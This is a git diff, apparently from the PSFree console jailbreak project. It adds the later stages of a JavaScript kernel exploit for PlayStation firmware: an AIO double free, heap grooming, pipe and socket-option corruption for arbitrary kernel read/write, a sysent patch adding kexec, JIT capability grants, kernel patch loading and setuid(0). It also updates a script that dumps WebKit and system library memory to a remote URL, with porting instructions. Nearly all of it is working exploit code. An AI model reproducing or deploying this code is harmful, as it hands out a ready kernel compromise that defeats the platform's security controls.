+
+        copyin(src, dst, len) {
+            this._verify_len(len);
+            const main = this.main_sd;
+            const worker = this.worker_sd;
+            const addr_buf = this.addr_buf;
+            const data_buf = this.data_buf;
+
+            addr_buf.write64(0, this.pipe_addr);
+            ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+            data_buf.write64(0, 0);
+            ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
+
+            addr_buf.write64(0, this.pipe_addr2);
+            ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+            addr_buf.write64(0, dst);
+            ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+            sysi('write', this.wpipe, src, len);
+        }
+
+        copyout(src, dst, len) {
+            this._verify_len(len);
+            const main = this.main_sd;
+            const worker = this.worker_sd;
+            const addr_buf = this.addr_buf;
+            const data_buf = this.data_buf;
+
+            addr_buf.write64(0, this.pipe_addr);
+            ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+            data_buf.write32(0, 0x40000000);
+            ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
+
+            addr_buf.write64(0, this.pipe_addr2);
+            ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+            addr_buf.write64(0, src);
+            ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+            sysi('read', this.rpipe, dst, len);
+        }
+
+        _read(addr) {
+            const buf = this.rw_buf;
+            buf.write64(0, addr);
+            buf.fill(0, 8);
+            ssockopt(this.main_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
+            gsockopt(this.worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
+        }
+
+        read32(addr) {
+            this._read(addr);
+            return this.rw_buf.read32(0);
+        }
+
+        read64(addr) {
+            this._read(addr);
+            return this.rw_buf.read64(0);
+        }
+
+        write32(addr, value) {
+            this.rw_buf.write32(0, value);
+            this.copyin(this.rw_buf.addr, addr, 4);
+        }
+
+        write64(addr, value) {
+            this.rw_buf.write64(0, value);
+            this.copyin(this.rw_buf.addr, addr, 8);
+        }
+    }
+    const kmem = new KernelMemory(main_sd, worker_sd, pipes, kpipe);
+
+    const kstr3_buf = new Buffer(8);
+    kmem.copyout(kernel_addr, kstr3_buf.addr, kstr3_buf.size);
+    const kstr3 = jstr(kstr3_buf);
+    log(`*(&"evf cv"): ${kstr3}`);
+    if (kstr3 !== 'evf cv') {
+        die('pipe read failed');
+    }
+    log('achieved arbitrary kernel read/write');
+
+    // RESTORE: clean corrupt pointers
+    // pktopts.ip6po_rthdr = NULL
+    const off_ip6po_rthdr = 0x68;
+    const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
+    log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
+    kmem.write64(r_rthdr_p, 0);
+    log(`reclaim rthdr: ${kmem.read64(r_rthdr_p)}`);
+
+    const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
+    log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
+    log(kmem.read64(w_rthdr_p));
+    log(`reclaim rthdr: ${kmem.read64(w_rthdr_p)}`);
+
+    log('corrupt pointers cleaned');
+
+    /*
+    // REMOVE once restore kernel is ready for production
+    // increase the ref counts to prevent deallocation
+    kmem.write32(main_sock, kmem.read32(main_sock) + 1);
+    kmem.write32(worker_sock, kmem.read32(worker_sock) + 1);
+    // +2 since we have to take into account the fget_write()'s reference
+    kmem.write32(pipe_file.add(0x28), kmem.read32(pipe_file.add(0x28)) + 2);
+    */
+
+    return [kbase, kmem, p_ucred, [kpipe, pipe_save, pktinfo_p, w_pktinfo]];
+}
+
+// FUNCTIONS FOR STAGE: PATCH KERNEL
+
+async function get_patches(url) {
+    const response = await fetch(url);
+    if (!response.ok) {
+        throw Error(
+            `Network response was not OK, status: ${response.status}\n`
+            + `failed to fetch: ${url}`);
+    }
+    return response.arrayBuffer();
+}
+
+// TODO 9.00 supported only
+//TODO: Needs porting to 9.00
+async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
+    if (!is_ps4) {
+        throw RangeError('PS5 kernel patching unsupported');
+    }
+    if (!(0x800 <= version < 0x900)) {
+        throw RangeError('kernel patching unsupported');
+    }
+
+    log('change sys_aio_submit() to sys_kexec()');
+    // sysent[661] is unimplemented so free for use
+    const offset_sysent_661 = 0x00410830;
+    const sysent_661 = kbase.add(offset_sysent_661);
+    // .sy_narg = 6
+    kmem.write32(sysent_661, 6);
+    // .sy_call = gadgets['jmp qword ptr [rsi]']
+    kmem.write64(sysent_661.add(8), kbase.add(0xe629c));
+    // .sy_thrcnt = SY_THR_STATIC
+    kmem.write32(sysent_661.add(0x2c), 1);
+
+    log('add JIT capabilities');
+    // TODO just set the bits for JIT privs
+    // cr_sceCaps[0]
+    kmem.write64(p_ucred.add(0x60), -1);
+    // cr_sceCaps[1]
+    kmem.write64(p_ucred.add(0x68), -1);
+
+    const buf = await get_patches('/kpatch/80x.elf');
+    // FIXME handle .bss segment properly
+    // assume start of loadable segments is at offset 0x1000
+    const patches = new View1(await buf, 0x1000);
+    let map_size = patches.size;
+    const max_size = 0x10000000;
+    if (map_size > max_size) {
+        die(`patch file too large (>${max_size}): ${map_size}`);
+    }
+    if (map_size === 0) {
+        die('patch file size is zero');
+    }
+    map_size = map_size+page_size & -page_size;
+
+    const prot_rwx = 7;
+    const prot_rx = 5;
+    const prot_rw = 3;
+    const exec_p = new Int(0, 9);
+    const write_p = new Int(max_size, 9);
+    const exec_fd = sysi('jitshm_create', 0, map_size, prot_rwx);
+    const write_fd = sysi('jitshm_alias', exec_fd, prot_rw);
+
+    const exec_addr = chain.sysp(
+        'mmap',
+        exec_p,
+        map_size,
+        prot_rx,
+        MAP_SHARED|MAP_FIXED,
+        exec_fd,
+        0,
+    );
+    const write_addr = chain.sysp(
+        'mmap',
+        write_p,
+        map_size,
+        prot_rw,
+        MAP_SHARED|MAP_FIXED,
+        write_fd,
+        0,
+    );
+
+    log(`exec_addr: ${exec_addr}`);
+    log(`write_addr: ${write_addr}`);
+    if (exec_addr.ne(exec_p) || write_addr.ne(write_p)) {
+        die('mmap() for jit failed');
+    }
+
+    log('mlock exec_addr for kernel exec');
+    sysi('mlock', exec_addr, map_size);
+
+    // mov eax, 0x1337; ret (0xc300_0013_37b8)
+    const test_code = new Int(0x001337b8, 0xc300);
+    write_addr.write64(0, test_code);
+
+    log('test jit exec');
+    sys_void('kexec', exec_addr);
+    let retval = chain.errno;
+    log('returned successfully');
+
+    log(`jit retval: ${retval}`);
+    if (retval !== 0x1337) {
+        die('test jit exec failed');
+    }
+
+    const pipe_save = restore_info[1];
+    restore_info[1] = pipe_save.addr;
+    log('mlock pipe save data for kernel restore');
+    sysi('mlock', restore_info[1], page_size);
+
+    mem.cpy(write_addr, patches.addr, patches.size);
+    sys_void('kexec', exec_addr, ...restore_info);
+
+    log('setuid(0)');
+    sysi('setuid', 0);
+    log('kernel exploit succeeded!');
+}
+
+// FUNCTIONS FOR STAGE: SETUP
+
+function setup(block_fd) {
+    // this part will block the worker threads from processing entries so that
+    // we may cancel them instead. this is to work around the fact that
+    // aio_worker_entry2() will fdrop() the file associated with the aio_entry
+    // on ps5. we want aio_multi_delete() to call fdrop()
+    log('block AIO');
+    const reqs1 = new Buffer(0x28 * num_workers);
+    const block_id = new Word();
+
+    for (let i = 0; i < num_workers; i++) {
+        reqs1.write32(8 + i*0x28, 1);
+        reqs1.write32(0x20 + i*0x28, block_fd);
+    }
+    aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
+
+    {
+        const reqs1 = make_reqs1(1);
+        const timo = new Word(1);
+        const id = new Word();
+        aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
+        chain.do_syscall_clear_errno(
+            'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
+        const err = chain.errno;
+        if (err !== 60) { // ETIMEDOUT
+            die(`SceAIO system not blocked. errno: ${err}`);
+        }
+        free_aios(id.addr, 1);
+    }
+
+    log('heap grooming');
+    // chosen to maximize the number of 0x80 malloc allocs per submission
+    const num_reqs = 3;
+    const groom_ids = new View4(num_grooms);
+    const groom_ids_p = groom_ids.addr;
+    const greqs = make_reqs1(num_reqs);
+    // allocate enough so that we start allocating from a newly created slab
+    spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
+    cancel_aios(groom_ids_p, num_grooms);
+    return [block_id, groom_ids];
+}
+
+// overview:
+// * double free a aio_entry (resides at a 0x80 malloc zone)
+// * type confuse a evf and a ip6_rthdr
+// * use evf/rthdr to read out the contents of the 0x80 malloc zone
+// * leak a address in the 0x100 malloc zone
+// * write the leaked address to a aio_entry
+// * double free the leaked address
+// * corrupt a ip6_pktopts for restricted r/w
+// * corrupt a pipe for arbitrary r/w
+//
+// the exploit implementation also assumes that we are pinned to one core
+export async function kexploit() {
+    
+    const _init_t1 = performance.now();
+    await init();
+    const _init_t2 = performance.now();
+
+    // fun fact:
+    // if the first thing you do since boot is run the web browser, WebKit can
+    // use all the cores
+    const main_mask = new Long();
+    get_our_affinity(main_mask);
+    log(`main_mask: ${main_mask}`);
+    
+
+    // pin to 1 core so that we only use 1 per-cpu bucket. this will make heap
+    // spraying and grooming easier
+    log(`pinning process to core #${main_core}`);
+    set_our_affinity(new Long(1 << main_core));
+    get_our_affinity(main_mask);
+    log(`main_mask: ${main_mask}`);
+
+    log("setting main thread's priority");
+    sysi('rtprio_thread', RTP_SET, 0, rtprio.addr);
+
+    const [block_fd, unblock_fd] = (() => {
+        const unix_pair = new View4(2);
+        sysi('socketpair', AF_UNIX, SOCK_STREAM, 0, unix_pair.addr);
+        return unix_pair;
+    })();
+
+    const sds = [];
+    for (let i = 0; i < num_sds; i++) {
+        sds.push(new_socket());
+    }
+
+    let block_id = null;
+    let groom_ids = null;
+    try {
+        log('STAGE: Setup');
+        [block_id, groom_ids] = setup(block_fd);
+
+        log('\nSTAGE: Double free AIO queue entry');
+        const sd_pair = double_free_reqs2(sds);
+
+        log('\nSTAGE: Leak kernel addresses');
+        const [
+            reqs1_addr, kbuf_addr, kernel_addr, target_id, evf,
+        ] = leak_kernel_addrs(sd_pair);
+
+        log('\nSTAGE: Double free SceKernelAioRWRequest');
+        const [pktopts_sds, dirty_sd] = double_free_reqs1(
+            reqs1_addr, kbuf_addr, target_id, evf, sd_pair[0], sds,
+        );
+
+        log('\nSTAGE: Get arbitrary kernel read/write');
+        const [kbase, kmem, p_ucred, restore_info] = make_kernel_arw(
+            pktopts_sds, dirty_sd, reqs1_addr, kernel_addr, sds);
+
+        //log('\nSTAGE: Patch kernel');
+        //await patch_kernel(kbase, kmem, p_ucred, restore_info);
+    } finally {
+        close(unblock_fd);
+
+        const t2 = performance.now();
+        const ftime = t2 - t1;
+        const init_time = _init_t2 - _init_t1;
+        log('\ntime (include init): ' + (ftime) / 1000);
+        log('kex time: ' + (t2 - _init_t2) / 1000);
+        log('init time: ' + (init_time) / 1000);
+        log('time to init: ' + (_init_t1 - t1) / 1000);
+        log('time - init time: ' + (ftime - init_time) / 1000);
+    }
+    close(block_fd);
+    free_aios2(groom_ids.addr, groom_ids.length);
+    aio_multi_wait(block_id.addr, 1);
+    aio_multi_delete(block_id.addr, block_id.length);
+    for (const sd of sds) {
+        close(sd);
+    }
+}
+kexploit();
diff --git a/send.mjs b/send.mjs
index 83cd176..508700e 100644
--- a/send.mjs
+++ b/send.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2024 anonymous
+/* Copyright (C) 2024-2025 anonymous
 
 This file is part of PSFree.
 
@@ -15,15 +15,55 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
+// script for dumping libSceNKWebKit.sprx, libkernel_web.sprx, and
+// libSceLibcInternal.sprx
+
+// This script is for firmware 8.0x. You need to port this to your firmware if
+// you want to use it. It only dumps the .text and PT_SCE_RELRO segments. It
+// doesn't dump the entire ELF file.
+//
+// There's also some miscellaneous functions to dump functions from WebKit that
+// were studied during the development of PSFree.
+
+// libkernel libraries contain syscalls
+// syscalls are enforced to be called from these libraries
+//
+// libkernel_web.sprx is used by the browser in firmwares >= 6.00
+// libkernel.sprx for firmwares below
+//
+// libkernel_sys.sprx contains syscalls that aren't found in the others, such
+// as mount and nmount
+//
+// the BD-J app uses libkernel_sys.sprx for example
+
+// Porting HOWTO:
+//
+// You can only dump the WebKit module (libSceNKWebKit.sprx for FW >= 6.00,
+// else libSceWebkit2.sprx) initially via dump_libwebkit() on any firmware.
+// We'll use the WebKit dump to search for imported functions from libkernel
+// and LibcInternal. Once we resolve the imports, we can use find_base() to get
+// the boundaries of these modules.
+//
+// Most of the work is done for you at dump_lib*(). You just need to find the
+// offset of the imported functions relative to WebKit's base address.
+//
+// import candidates:
+//
+// __stack_chk_fail() is a good import from libkernel to search for as it's
+// easy to find since most functions are protected by a stack canary.
+//
+// For a LibcInternal import we searched for strlen() but you can search for
+// any libc function such as memcpy().
+
 import * as config from './config.mjs';
 
 import { Int } from './module/int64.mjs';
 import { Addr, mem } from './module/mem.mjs';
 import { make_buffer, find_base, resolve_import } from './module/memtools.mjs';
-import { KB, MB } from './module/constants.mjs';
+import { KB, MB } from './module/offset.mjs';
 
 import {
-    debug_log,
+    log,
     align,
     die,
     send,
@@ -51,9 +91,9 @@ function get_boundaries(leak) {
 // dump a module's .text and PT_SCE_RELRO segments only
 function dump(name, lib_base, lib_end) {
     // assumed size < 4GB
-    const lib_size = lib_end.sub(lib_base).low();
-    debug_log(`${name} base: ${lib_base}`);
-    debug_log(`${name} size: ${lib_size}`);
+    const lib_size = lib_end.sub(lib_base).lo;
+    log(`${name} base: ${lib_base}`);
+    log(`${name} size: ${lib_size}`);
     const lib = make_buffer(
         lib_base,
         lib_size
@@ -62,7 +102,7 @@ function dump(name, lib_base, lib_end) {
         url,
         lib,
         `${name}.sprx.text_${lib_base}.bin`,
-        () => debug_log(`${name} sent`)
+        () => log(`${name} sent`)
     );
 }
 
@@ -76,9 +116,9 @@ function dump_libwebkit() {
     // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
     addr = addr.readp(0);
 
-    debug_log(`vtable: ${addr}`);
+    log(`vtable: ${addr}`);
     const vtable = make_buffer(addr, 0x400);
-    send(url, vtable, `vtable_${addr}.bin`, () => debug_log('vtable sent'));
+    send(url, vtable, `vtable_${addr}.bin`, () => log('vtable sent'));
 
     const [lib_base, lib_end] = get_boundaries(addr);
     dump('libSceNKWebKit', lib_base, lib_end);
@@ -94,7 +134,7 @@ function dump_libkernel(libwebkit_base) {
     const stack_chk_fail_import = libwebkit_base.add(offset);
 
     const libkernel_leak = resolve_import(stack_chk_fail_import);
-    debug_log(`__stack_chk_fail import: ${libkernel_leak}`);
+    log(`__stack_chk_fail import: ${libkernel_leak}`);
 
     const [lib_base, lib_end] = get_boundaries(libkernel_leak);
     dump('libkernel_web', lib_base, lib_end);
@@ -108,7 +148,7 @@ function dump_libc(libwebkit_base) {
     const strlen_import = libwebkit_base.add(offset);
 
     const libc_leak = resolve_import(strlen_import);
-    debug_log(`strlen import: ${libc_leak}`);
+    log(`strlen import: ${libc_leak}`);
 
     const [lib_base, lib_end] = get_boundaries(libc_leak);
     dump('libSceLibcInternal', lib_base, lib_end);
@@ -158,7 +198,7 @@ function dump_eval() {
         url,
         make_buffer(impl, 0x800),
         `eval_dump_offset_${offset}.bin`,
-        () => debug_log('sent')
+        () => log('sent')
     );
 }
 
@@ -186,8 +226,6 @@ function dump_scrollLeft() {
         url,
         make_buffer(getter, 0x800),
         `scrollLeft_getter_dump_offset_${offset}.bin`,
-        () => debug_log('sent')
+        () => log('sent')
     );
 }
-
-dump_scrollLeft();